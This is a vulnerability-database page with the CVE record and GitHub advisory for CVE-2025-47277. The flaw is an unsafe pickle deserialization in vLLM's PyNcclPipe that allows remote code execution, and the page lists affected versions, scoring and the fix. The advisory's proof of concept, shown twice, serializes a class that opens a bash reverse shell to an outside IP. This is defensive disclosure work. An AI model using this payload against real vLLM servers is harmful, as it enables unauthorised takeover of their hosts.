cve-2025-47277
Vulnerability from cvelistv5
Published
2025-05-20 17:32
Modified
2025-05-20 17:52
Severity ?
EPSS score ?
Summary
vLLM Allows Remote Code Execution via PyNcclPipe Communication Service
References
Impacted products
| ▼ | Vendor | Product |
|---|---|---|
| vllm-project | vllm |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-47277",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-20T17:52:22.643444Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T17:52:31.274Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "vllm",
"vendor": "vllm-project",
"versions": [
{
"status": "affected",
"version": "\u003e= 0.6.5, \u003c 0.8.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "vLLM, an inference and serving engine for large language models (LLMs), has an issue in versions 0.6.5 through 0.8.4 that ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected. vLLM supports the use of the\u00a0`PyNcclPipe`\u00a0class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the\u00a0`PyNcclCommunicator`\u00a0class, while CPU-side control message passing is handled via the\u00a0`send_obj`\u00a0and\u00a0`recv_obj`\u00a0methods on the CPU side.\u200b The intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network. The default and intentional behavior from PyTorch is that the `TCPStore` interface listens on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the `TCPStore` instance to bind its socket to a specified private interface. As of version 0.8.5, vLLM limits the `TCPStore` socket to the private interface as configured."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-20T17:32:27.034Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv"
},
{
"name": "https://github.com/vllm-project/vllm/pull/15988",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vllm-project/vllm/pull/15988"
},
{
"name": "https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7"
},
{
"name": "https://docs.vllm.ai/en/latest/deployment/security.html",
"tags": [
"x_refsource_MISC"
],
"url": "https://docs.vllm.ai/en/latest/deployment/security.html"
}
],
"source": {
"advisory": "GHSA-hjq4-87xh-g4fv",
"discovery": "UNKNOWN"
},
"title": "vLLM Allows Remote Code Execution via PyNcclPipe Communication Service"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-47277",
"datePublished": "2025-05-20T17:32:27.034Z",
"dateReserved": "2025-05-05T16:53:10.373Z",
"dateUpdated": "2025-05-20T17:52:31.274Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-47277\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-20T18:15:46.730\",\"lastModified\":\"2025-08-13T16:35:57.357\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"vLLM, an inference and serving engine for large language models (LLMs), has an issue in versions 0.6.5 through 0.8.4 that ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected. vLLM supports the use of the\u00a0`PyNcclPipe`\u00a0class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the\u00a0`PyNcclCommunicator`\u00a0class, while CPU-side control message passing is handled via the\u00a0`send_obj`\u00a0and\u00a0`recv_obj`\u00a0methods on the CPU side.\u200b The intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network. The default and intentional behavior from PyTorch is that the `TCPStore` interface listens on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the `TCPStore` instance to bind its socket to a specified private interface. As of version 0.8.5, vLLM limits the `TCPStore` socket to the private interface as configured.\"},{\"lang\":\"es\",\"value\":\"vLLM, un motor de inferencia y servicio para modelos de lenguaje grandes (LLM), presenta un problema en las versiones 0.6.5 a 0.8.4 que SOLO afecta a entornos que utilizan la integraci\u00f3n de transferencia de cach\u00e9 KV `PyNcclPipe` con el motor V0. Ninguna otra configuraci\u00f3n se ve afectada. vLLM admite el uso de la clase `PyNcclPipe` para establecer un dominio de comunicaci\u00f3n punto a punto para la transmisi\u00f3n de datos entre nodos distribuidos. La transmisi\u00f3n de cach\u00e9 KV del lado de la GPU se implementa mediante la clase `PyNcclCommunicator`, mientras que el paso de mensajes de control del lado de la CPU se gestiona mediante los m\u00e9todos `send_obj` y `recv_obj` en el lado de la CPU. El objetivo era que esta interfaz solo se expusiera a una red privada utilizando la direcci\u00f3n IP especificada por el par\u00e1metro de CLI `--kv-ip`. La documentaci\u00f3n de vLLM explica c\u00f3mo esto debe limitarse a una red segura. El comportamiento predeterminado e intencional de PyTorch es que la interfaz `TCPStore` escucha en TODAS las interfaces, independientemente de la direcci\u00f3n IP proporcionada. La direcci\u00f3n IP proporcionada solo se usaba como direcci\u00f3n del cliente. vLLM se corrigi\u00f3 para usar una soluci\u00f3n alternativa que obligaba a la instancia `TCPStore` a vincular su socket a una interfaz privada espec\u00edfica. A partir de la versi\u00f3n 0.8.5, vLLM limita el socket `TCPStore` a la interfaz privada configurada.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"0.6.5\",\"versionEndExcluding\":\"0.8.5\",\"matchCriteriaId\":\"24BAE45E-0FCF-4E74-953A-88F12E093C0F\"}]}]}],\"references\":[{\"url\":\"https://docs.vllm.ai/en/latest/deployment/security.html\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Technical Description\"]},{\"url\":\"https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/vllm-project/vllm/pull/15988\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\",\"Patch\"]},{\"url\":\"https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
}
}
ghsa-hjq4-87xh-g4fv
Vulnerability from github
Published
2025-05-20 18:04
Modified
2025-05-20 20:56
Severity ?
Summary
vLLM Allows Remote Code Execution via PyNcclPipe Communication Service
Details
Impacted Environments
This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.
Summary
vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.
A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.
The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html
Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.
This issue was reported privately to PyTorch and they determined that this behavior was intentional.
Details
The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to Remote Code Execution.
- Deploy a
PyNcclPipeservice configured to listen on port18888when launched: ```python from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe from vllm.config import KVTransferConfig
config=KVTransferConfig( kv_ip="0.0.0.0", kv_port=18888, kv_rank=0, kv_parallel_size=1, kv_buffer_size=1024, kv_buffer_device="cpu" )
p=PyNcclPipe(config=config,local_rank=0) p.recv_tensor() # Receive data ```
- The attacker crafts malicious packets and sends them to the
PyNcclPipeservice:
```python from vllm.distributed.utils import StatelessProcessGroup
class Evil: def reduce(self): import os cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"' return (os.system,(cmd,))
client = StatelessProcessGroup.create( host='172.17.0.1', port=18888, rank=1, world_size=2, )
client.send_obj(obj=Evil(),dst=0) ```
The call stack triggering RCE is as follows:
vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
-> pickle.loads
Getshell as follows:
Reporters
This issue was reported independently by three different parties:
- @kikayli (Zhuque Lab, Tencent)
- @omjeki
- Russell Bryant (@russellb)
Fix
- https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the
TCPStoresocket to the private interface as configured.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "vllm"
},
"ranges": [
{
"events": [
{
"introduced": "0.6.5"
},
{
"fixed": "0.8.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-47277"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-05-20T18:04:30Z",
"nvd_published_at": "2025-05-20T18:15:46Z",
"severity": "CRITICAL"
},
"details": "### Impacted Environments\n\nThis issue ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected.\n\n### Summary\nvLLM supports the use of the\u00a0`PyNcclPipe`\u00a0class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the\u00a0`PyNcclCommunicator`\u00a0class, while CPU-side control message passing is handled via the\u00a0`send_obj`\u00a0and\u00a0`recv_obj`\u00a0methods on the CPU side.\u200b \n\nA remote code execution vulnerability exists in the `PyNcclPipe` service. Attackers can exploit this by sending malicious serialized data to gain server control privileges. \n\nThe intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html\n\nUnfortunately, the default behavior from PyTorch is that the `TCPStore` interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the `TCPStore` instance to bind its socket to a specified private interface.\n\nThis issue was reported privately to PyTorch and they determined that this behavior was intentional.\n\n### Details\nThe `PyNcclPipe` implementation contains a critical security flaw where it directly processes client-provided data using `pickle.loads` , creating an unsafe deserialization vulnerability that can lead to \u200bRemote Code Execution.\n\n1. Deploy a `PyNcclPipe` service configured to listen on port `18888` when launched:\n```python\nfrom vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe\nfrom vllm.config import KVTransferConfig\n\nconfig=KVTransferConfig(\n kv_ip=\"0.0.0.0\",\n kv_port=18888,\n kv_rank=0,\n kv_parallel_size=1,\n kv_buffer_size=1024,\n kv_buffer_device=\"cpu\"\n)\n\np=PyNcclPipe(config=config,local_rank=0)\np.recv_tensor() # Receive data\n```\n\n2. The attacker crafts malicious packets and sends them to the `PyNcclPipe` service:\n\n```python\nfrom vllm.distributed.utils import StatelessProcessGroup\n\nclass Evil:\n def __reduce__(self):\n import os\n cmd=\u0027/bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/172.28.176.1/8888 0\u003e\u00261\"\u0027\n return (os.system,(cmd,))\n\nclient = StatelessProcessGroup.create(\n host=\u0027172.17.0.1\u0027,\n port=18888,\n rank=1,\n world_size=2,\n)\n\nclient.send_obj(obj=Evil(),dst=0)\n```\n\nThe call stack triggering \u200bRCE is as follows:\n\n```\nvllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl\n\t-\u003e vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata\n\t\t-\u003e vllm.distributed.utils.StatelessProcessGroup.recv_obj\n\t\t\t-\u003e pickle.loads \n```\n\nGetshell as follows: \n\n\n\n### Reporters\n\nThis issue was reported independently by three different parties:\n\n* @kikayli (Zhuque Lab, Tencent)\n* @omjeki\n* Russell Bryant (@russellb)\n\n### Fix\n\n* https://github.com/vllm-project/vllm/pull/15988 -- vLLM now limits the `TCPStore` socket to the private interface as configured.",
"id": "GHSA-hjq4-87xh-g4fv",
"modified": "2025-05-20T20:56:42Z",
"published": "2025-05-20T18:04:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47277"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/pull/15988"
},
{
"type": "WEB",
"url": "https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7"
},
{
"type": "WEB",
"url": "https://docs.vllm.ai/en/latest/deployment/security.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/vllm-project/vllm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vLLM Allows Remote Code Execution via PyNcclPipe Communication Service"
}
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.